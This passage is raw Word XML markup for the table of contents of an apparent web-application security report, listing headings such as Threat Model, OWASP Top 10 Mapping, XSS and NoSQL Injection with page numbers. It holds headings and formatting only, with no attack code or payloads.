            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EE59635" w14:textId="6DF4CDAF" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584797" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High Level Architecture Design</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584797 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38C04E0A" w14:textId="4E79CD86" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584798" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client Frontend (React)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="447EA6DB" w14:textId="54E7DC30" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584799" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Server Backend (Express + Node.js)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584799 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49D3F580" w14:textId="680E7E3A" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584800" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Database (MongoDB + Mongoose)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584800 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="637E1673" w14:textId="11BCB494" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584801" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Threat Model</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584801 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="773029A4" w14:textId="322BDF8B" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584802" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Threat Actors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584802 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DBA800D" w14:textId="1FA39D64" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584803" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Assets At Risk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584803 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46CF35C9" w14:textId="56E3D960" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584804" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Surface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584804 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="164F294D" w14:textId="58796F59" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584805" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iv.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Top 10 Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584805 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75F03B2C" w14:textId="4566C7A4" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584806" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit Simulations &amp; Fixes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584806 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C1AFCC6" w14:textId="5C4A4082" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584807" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584807 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52600016" w14:textId="4D5C97CA" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc214584808" w:history="1">
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ii.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A372AC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NoSQL Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc214584808 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00582176">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47F022C2" w14:textId="25AC0A2B" w:rsidR="008907AE" w:rsidRDefault="008907AE">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9736"/>
